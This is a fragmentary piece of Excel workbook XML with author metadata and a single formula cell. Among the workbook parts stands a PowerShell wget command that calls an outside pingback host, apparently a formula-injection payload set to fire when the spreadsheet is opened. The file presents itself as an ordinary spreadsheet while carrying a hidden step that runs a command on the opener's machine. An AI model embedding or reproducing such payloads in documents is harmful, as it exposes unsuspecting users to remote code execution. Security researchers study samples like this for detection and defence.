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rutto\Desktop\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{0B1225EE-B151-4855-890D-DFC102300E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yloa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powershell wget http://pingb.in/p/03e8fef1e7d875c304b342e0b022 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5" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="1" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1" t="e" cm="1">
        <f t="array" ref="A1">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Berrutto Maximiliano</dc:creator>
  <cp:lastModifiedBy>Max Berrutto</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-02-13T14:54:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-02-13T15:10:05Z</dcterms:modified>
</cp:coreProperties>
</file>